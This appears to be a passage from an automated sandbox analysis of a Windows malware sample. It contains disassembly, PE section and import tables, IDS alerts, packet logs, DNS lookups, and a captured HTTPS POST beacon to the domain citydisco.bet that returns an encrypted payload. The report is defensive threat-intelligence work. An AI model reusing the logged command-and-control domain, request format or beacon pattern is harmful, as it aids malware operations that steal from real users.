xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0045C860h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0045C820h]
xor dword ptr [ebp-04h], eax
call dword ptr [0045C81Ch]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0045C8A8h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 004614D0h
call dword ptr [0045C880h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F3B70EBE0F5h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5c650	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xbb200	0x4540	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x63000	0x276c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x58b28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x54f98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5c7c0	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x52cc0	0x52e00	b955d299ddc749adb9e2a9fa46e5dda4	False	0.5095947633861236	data	6.772334323063753	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x54000	0xa124	0xa200	147c72eee2c66963ee69f82cf3610cb3	False	0.4244068287037037	data	4.908125312415663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5f000	0x2c9c	0x1600	eab85ca8d24299491f287a6faf9660e1	False	0.4069602272727273	data	4.744736283390186	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x62000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x63000	0x276c	0x2800	ed7d506be2e46b9b1c8fde31ac68b654	False	0.7849609375	data	6.600494306172883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x66000	0x59c00	0x59c00	6e80881078ff588d652dfd7fb74a75be	False	1.0003291478064067	data	7.99946821357417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T13:40:02.518004+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49682	188.114.96.3	443	TCP
2025-03-13T13:40:05.224227+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49683	188.114.96.3	443	TCP
2025-03-13T13:40:07.777182+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49684	188.114.96.3	443	TCP
2025-03-13T13:40:10.474420+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49685	188.114.96.3	443	TCP
2025-03-13T13:40:13.230735+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49686	188.114.96.3	443	TCP
2025-03-13T13:40:16.065897+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49687	188.114.96.3	443	TCP
2025-03-13T13:40:20.907435+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49693	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:40:01.159260988 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:01.159311056 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:01.159377098 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:01.163002014 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:01.163022995 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:02.517869949 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:02.518003941 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:02.542736053 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:02.542759895 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:02.543082952 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:02.586765051 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:02.640908003 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:02.640937090 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:02.641046047 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.520678043 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.520728111 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.520759106 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.520791054 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.520829916 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.520859957 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.520874023 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.543864965 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.543912888 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.543960094 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.543977022 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.544035912 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.550540924 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.550616980 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.550653934 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.550672054 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.593951941 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.608583927 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.649308920 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.698528051 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.698606014 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.698685884 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.699604988 CET	49682	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.699624062 CET	443	49682	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.895450115 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.895509005 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:03.895584106 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.895910978 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:03.895926952 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:05.224081993 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:05.224226952 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:05.304263115 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:05.304322958 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:05.304611921 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:05.317087889 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:05.317218065 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:05.317245960 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:06.291697025 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:06.291809082 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:06.291877985 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:06.292051077 CET	49683	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:06.292064905 CET	443	49683	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:06.421761036 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:06.421809912 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:06.421889067 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:06.422194004 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:06.422204971 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:07.777069092 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:07.777182102 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:07.788371086 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:07.788386106 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:07.788620949 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:07.789762020 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:07.789805889 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:07.789829969 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:07.789920092 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:07.789925098 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:08.784322977 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:08.784431934 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:08.784518957 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:08.784636974 CET	49684	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:08.784653902 CET	443	49684	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:09.003849030 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:09.003911972 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:09.003998041 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:09.004297018 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:09.004314899 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:10.474320889 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:10.474420071 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:10.475689888 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:10.475703001 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:10.476002932 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:10.477216959 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:10.477365017 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:10.477392912 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:10.477447033 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:10.477453947 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:11.526227951 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:11.526335001 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:11.526437044 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:11.526623011 CET	49685	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:11.526642084 CET	443	49685	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:11.829634905 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:11.829710007 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:11.829782963 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:11.830090046 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:11.830100060 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:13.230619907 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:13.230735064 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:13.232136965 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:13.232147932 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:13.232407093 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:13.233747005 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:13.233938932 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:13.233963013 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:14.242460966 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:14.242561102 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:14.242659092 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:14.242855072 CET	49686	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:14.242875099 CET	443	49686	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:14.716888905 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:14.716959953 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:14.717041016 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:14.717489958 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:14.717510939 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.065812111 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.065896988 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.067240953 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.067250013 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.067498922 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.082762957 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.083477974 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.083518028 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.083621979 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.083658934 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.083760023 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.083834887 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.083985090 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084022045 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084162951 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084192991 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084345102 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084378004 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084387064 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084472895 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084512949 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084547997 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084557056 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084610939 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084697962 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084728003 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084753036 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084778070 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084779024 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084831953 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084844112 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:16.084866047 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:16.084898949 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:19.440265894 CET	443	49687	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:19.441451073 CET	49687	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:19.451642036 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:19.451683998 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:19.451756001 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:19.452070951 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:19.452084064 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:20.907357931 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:20.907434940 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:20.908745050 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:20.908760071 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:20.908994913 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:20.951770067 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:20.951790094 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:20.951875925 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.878138065 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.878190041 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.878226042 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.878242970 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:21.878274918 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.878315926 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.878320932 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:21.878329992 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.878377914 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:21.884613991 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.884682894 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.884726048 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:21.884736061 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.891243935 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.891300917 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:21.891349077 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:21.891366005 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:21.891376972 CET	49693	443	192.168.2.8	188.114.96.3
Mar 13, 2025 13:40:21.891381979 CET	443	49693	188.114.96.3	192.168.2.8
Mar 13, 2025 13:40:44.376758099 CET	53549	53	192.168.2.8	162.159.36.2
Mar 13, 2025 13:40:44.381432056 CET	53	53549	162.159.36.2	192.168.2.8
Mar 13, 2025 13:40:44.383791924 CET	53549	53	192.168.2.8	162.159.36.2
Mar 13, 2025 13:40:44.388499975 CET	53	53549	162.159.36.2	192.168.2.8
Mar 13, 2025 13:40:44.850563049 CET	53549	53	192.168.2.8	162.159.36.2
Mar 13, 2025 13:40:44.855618000 CET	53	53549	162.159.36.2	192.168.2.8
Mar 13, 2025 13:40:44.855686903 CET	53549	53	192.168.2.8	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:40:01.082463980 CET	65137	53	192.168.2.8	1.1.1.1
Mar 13, 2025 13:40:01.130120039 CET	53	65137	1.1.1.1	192.168.2.8
Mar 13, 2025 13:40:44.375241041 CET	53	63906	162.159.36.2	192.168.2.8
Mar 13, 2025 13:40:44.893451929 CET	53	57671	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 13:40:01.082463980 CET	192.168.2.8	1.1.1.1	0x5a4f	Standard query (0)	citydisco.bet	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 13:40:01.130120039 CET	1.1.1.1	192.168.2.8	0x5a4f	No error (0)	citydisco.bet		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:40:01.130120039 CET	1.1.1.1	192.168.2.8	0x5a4f	No error (0)	citydisco.bet		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

citydisco.bet

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49682	188.114.96.3	443	4600	C:\Users\user\Desktop\SoftWare.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:40:02 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: citydisco.bet
2025-03-13 12:40:02 UTC	61	OUT	Data Raw: 75 69 64 3d 38 30 37 31 32 36 30 36 62 36 32 33 32 64 34 37 30 38 66 66 37 65 34 62 66 66 36 37 37 32 37 37 38 62 30 38 32 38 39 37 66 65 36 33 37 32 39 64 31 33 32 39 26 63 69 64 3d Data Ascii: uid=80712606b6232d4708ff7e4bff6772778b082897fe63729d1329&cid=
2025-03-13 12:40:03 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:40:03 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HZE42lebvVo5g%2FqFvwTZPtjhz5L5Iqduh68LG3e15AM2Rpm0iTw9E6fXGBeBOqY6iO6VgSOFK6XWlZRClHtb6OZFMYT%2B8CmVp8SqTgObKNbiooXQENga4Fk5yh1qNKJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb98f9d92cf03c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=34473&min_rtt=31771&rtt_var=10764&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2831&recv_bytes=960&delivery_rate=102394&cwnd=234&unsent_bytes=0&cid=8607e6eaeb8db785&ts=1031&x=0"
2025-03-13 12:40:03 UTC	591	IN	Data Raw: 42 cd 94 95 49 8b b6 45 14 aa 37 e2 02 cb 4c 9f 54 b3 58 a0 aa f7 a6 a9 72 18 1a 8f 87 6d d2 b9 cb 3a ce 1c 24 b0 fc 56 99 b0 d9 6d eb 08 85 df 29 a3 ab 11 be e1 4f 1e 64 c6 80 d5 bb 2c 9d 87 b0 a4 9d af c5 46 ec 09 db ed b5 ab 65 a2 01 3a 11 6f 14 64 90 4d 85 3d 20 a0 4a d8 2c 01 8b 97 f6 4a 0c fd 8b a4 db d3 a0 36 86 00 17 62 45 04 73 26 1f ad 0c fe 66 01 93 8a 45 91 78 c9 c7 9f 88 ed 3d fd a8 58 39 8d b2 47 8d f2 75 42 2c 7f df 22 92 bb 3a 47 ae 33 ee 3e 08 42 85 73 40 47 f5 31 f2 69 f8 e5 f4 ed 62 35 ca a1 8d 88 61 19 82 eb 43 54 09 1b 36 c4 11 a7 1e 4f 71 e0 ac 8f 4d d6 86 34 01 82 e8 c1 c0 1e 76 33 43 91 e6 7b 61 f1 b8 41 b1 40 3d 7b 88 ca c4 27 1c ad 88 dd e9 04 66 4e 5f d6 7d 34 3d b9 0d e9 2b 62 ae be 4b 09 e5 a8 b4 49 0d e6 a5 e8 16 18 3e 5d d5 Data Ascii: BIE7LTXrm:$Vm)Od,Fe:odM= J,J6bEs&fEx=X9GuB,":G3>Bs@G1ib5aCT6OqM4v3C{aA@={'fN_}4=+bKI>]
2025-03-13 12:40:03 UTC	1369	IN	Data Raw: 51 5a e6 72 6b 80 27 34 7e 28 ec 0a 0e 53 5b ee 11 3d 90 53 3a b8 6d 46 10 5f f7 67 56 0f af 20 2d f1 a6 3e 2d a6 4a bb 87 17 7b 57 52 7e 03 c3 8a d4 6c a7 10 2d 3b fb 72 0c 0a 8a 9d 88 9b 38 1c d5 b8 f3 15 d1 a1 68 1a 43 55 20 6a 0d 6d 3c 6c e5 af bd 47 2d aa d8 1b 07 3f 7f ad 93 25 a9 89 45 1e 24 c2 06 b4 ec 26 ea 45 d7 d6 12 77 15 27 12 21 b1 71 4e eb 7b 36 9d bf 4d 8a c4 58 fb 4a 2f a7 e8 6a 4e 38 d0 46 a7 10 fd 76 5b 2f 97 ab 23 53 a3 2e 2c 4c 57 3a fa ff 1e e1 8f 32 e7 9a a4 00 b9 9f 3b 24 c2 28 cd 03 9e 48 7e 6d 0e ec 1e 6d ef 34 cc cc f7 cd 3b 41 61 2a 9d c6 f1 44 c7 a3 1d 7c 15 c0 6c a3 a3 3b ee 5d 9d 75 2b a9 ee 89 58 16 91 f4 52 06 5e 87 82 2d f3 43 b0 e5 51 ce a3 70 04 cd 51 9f 31 77 02 75 bd 5f d1 9a 9e 64 f2 54 98 66 74 72 fb 63 aa f1 3f f2 Data Ascii: QZrk'4~(S[=S:mF_gV ->-J{WR~l-;r8hCU jm<lG-?%E$&Ew'!qN{6MXJ/jN8Fv[/#S.,LW:2;$(H~mm4;Aa*D\|l;]u+XR^-CQpQ1wu_dTftrc?
